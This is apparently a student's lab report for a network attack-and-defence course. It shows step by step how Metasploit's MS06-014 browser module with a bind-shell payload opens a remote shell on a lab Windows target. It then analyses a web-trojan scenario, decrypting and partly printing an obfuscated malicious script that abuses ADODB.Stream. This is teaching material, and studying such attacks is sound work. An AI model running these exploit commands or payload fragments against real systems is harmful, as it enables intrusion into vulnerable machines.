20222958 2022-2023-2 《网络攻防实践》实践十一报告

20222958洪辉 2023-05-24 20:21:56

目录

  • 目录
  • 1. 实践内容
  • 2. 实践过程
  • 2.1 web浏览器渗透攻击
  • 2.2 取证分析实践—网页木马攻击场景分析
  • 3. 学习中遇到的问题及解决
  • 4. 实践总结
  • 参考资料
(20222958 2022-2023-2 《网络攻防实践》实践十一报告)

目录

1. 实践内容

(1)web浏览器渗透攻击

任务:使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。

实验步骤:

①选择使用Metasploit中的MS06-014渗透攻击模块

②选择PAYLOAD为任意远程Shell连接

③设置服务器地址和URL参数,运行exploit,构造出恶意网页木马脚本

④在靶机环境中启动浏览器,验证与服务器的连通性,并访问而已网页木马脚本URL

⑤在攻击机的Metasploit软件中查看渗透攻击状态,并通过成功渗透攻击后建立起的远程控制会话SESSION,在靶机上远程执行命令
(2)取证分析实践—网页木马攻击场景分析

实践过程:

①首先你应该访问start.html,在这个文件中给出了new09.htm的地址,

②在进入 htm 后,每解密出一个文件地址,请对其作 32 位 MD5 散列,以散列值为文件名到
http://192.168.68.253/scom/hashed/
哈希值下去下载对应的文件(注意:文件名中的英文字母为小写,且没有扩展名),即为解密出的地址对应的文件。

③如果解密出的地址给出的是网页或脚本文件,请继续解密。

④如果解密出的地址是二进制程序文件,请进行静态反汇编或动态调试。

⑤重复以上过程直到这些文件被全部分析完成。

(3)攻防对抗实践—web浏览器渗透攻击攻防

攻击方使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理之后组装成一个URL,通过具有欺骗性的电子邮件发送给防守方。

防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态,并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。

2. 实践过程

2.1 web浏览器渗透攻击

查看攻击机和靶机IP地址并测试其联通性
Win2k

在这里插入图片描述


Kali

在这里插入图片描述


在Kali中执行命令msfconsole打开Metasploit

在这里插入图片描述


执行命令search ms06-014查找使用的漏洞

在这里插入图片描述


执行命令
use exploit/windows/browser/ie_createobject
进入该渗透攻击模块。

在这里插入图片描述


执行命令show payloads查看payloads。

在这里插入图片描述


在这里插入图片描述


执行命令set payload windows/shell/bind_tcp,选择常用PAYLOAD为windows/shell/bind_tcp。

在这里插入图片描述


执行命令set Lhost 192.168.13.2设置本地IP为攻击机。然后输入exploit开始攻击,恶意服务器建立。

在这里插入图片描述


在这里插入图片描述


在靶机环境中启动浏览器访问这个恶意URL:
http://192.168.13.2:8080/frAvI7

在这里插入图片描述


回到攻击机上可以看到,一个靶机到攻击机的session被建立

在这里插入图片描述

执行命令sessions -i 1打开会话,然后输入ipconfig可以查看到靶机的IP等信息

在这里插入图片描述


在这里插入图片描述

2.2 取证分析实践—网页木马攻击场景分析

在这里插入图片描述


在这里插入图片描述

从这两处可以看出 start.html 文件在引用 new09.htm 文件时没有写绝对路径,所以new09.htm 文件与 start.html 文件在同一目录下。

可以看到 new09.htm 文件中,用 iframe 引用了一个 http://aa.18dd.net/aa/kl.htm 文件,又用 javascript 引用了一个 http://js.users.51.la/1299644.js 文件。 对http://aa.18dd.net/aa/kl.htm和http://js.users.51.la/1299644.js分别求散列值, 求得的md5散列值分别为7f60672dcd6b5e90b6772545ee219bd3和23180a42a2ff1192150231b44ffdf3d3 ![在这里插入图片描述](https://img-blog.csdnimg.cn/b177161672b842a2a2f8f388c262d3fd.png) ![在这里插入图片描述](https://img-blog.csdnimg.cn/9912a802fd414b5eabf2eabcc17d6195.png) 在hashed文件中找到对应的文件,用记事本打开。 23180a42a2ff1192150231b44ffdf3d3 中的内容如下,提示不是我们要找的内容。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/a4ab2fdf3568400fae57bc2c02cb9848.png) 7f60672dcd6b5e90b6772545ee219bd3的内容: ![在这里插入图片描述](https://img-blog.csdnimg.cn/91be3102be3d4ab1a800953d8d6f1507.png) 看起来很复杂,但实际上这是一种被称为 XXTEA+Base64 的加密方法,对付这种加密方法,我们只要找到它的加密密钥就可以。注意倒数第三行 ![在这里插入图片描述](https://img-blog.csdnimg.cn/859bad8d9b174b3daba21a345fc19efd.png) xxtea_decrypt 函数的第二个参数 \x73\x63\x72\x69\x70\x74 就是密钥。简单用16进制转换一下,得到密钥是script。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/80a67d47a6054c32b6ffd1bb62836a1e.png) 访问 http://www.cha88.cn/safe/xxtea.php (访问不了)。使用xxtea在线解密网站。输入秘钥密钥 script ,在下面大的文本框中粘贴7f60672dcd6b5e90b6772545ee219bd3.txt的全部内容,解密得到十六进制加密。在对对引号中的内容进行解密,得到如下结果,将结果保存: ![在这里插入图片描述](https://img-blog.csdnimg.cn/aa93d0c2fdec42ffaf71ccf80e22e013.png) 再对解密得到的16进制信息进行字符转换 ![在这里插入图片描述](https://img-blog.csdnimg.cn/523243b7092446788e483e54ee7cbf12.png) function init(){document.write();} window.onload = init; if(document.cookie.indexOf('OK')==-1){ try{var e; var ado=(document.createElement("object")); ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var as=ado.createobject("Adodb.Stream","")} catch(e){}; finally{ var expires=new Date(); expires.setTime(expires.getTime()+24*60*60*1000); document.cookie='ce=windowsxp;path=/;expires='+expires.toGMTString(); if(e!="[object Error]"){ document.write("ziWvENv
可以看到其中使用到document.location加载了payload,并且下一行中后面跟了一个可执行文件DlkweHFtwrOYQgbKo.exe,这个可执行文件是以攻击机为服务器,通过网页下载到靶机上的。为了躲避杀毒软件,每次加载恶意网页生成的可执行文件的名字是不一样的。

在这里插入图片描述


BD96C556-65A3-11D0-983A-00C04FC29E36 是漏洞MS06-014中的clsid变量,搜索 BD96C556,可知攻击者使用的漏洞是MS06-014。

3. 学习中遇到的问题及解决

问题:取证木马分析实验中,打开程序漏洞文件会被系统误删
解决:关闭防火墙

4. 实践总结

这次作业十分艰难,涉及面广、难度大,难以完全独立完成。很多内容是在同学的指导下完成的。

参考资料

《网络攻防技术与实践》

...全文
134 回复 打赏 收藏 转发到动态 举报
AI 作业
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复

77

社区成员

发帖
与我相关
我的任务
社区描述
网络攻防实践作业
网络安全系统安全 高校
社区管理员
  • blackwall0321
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧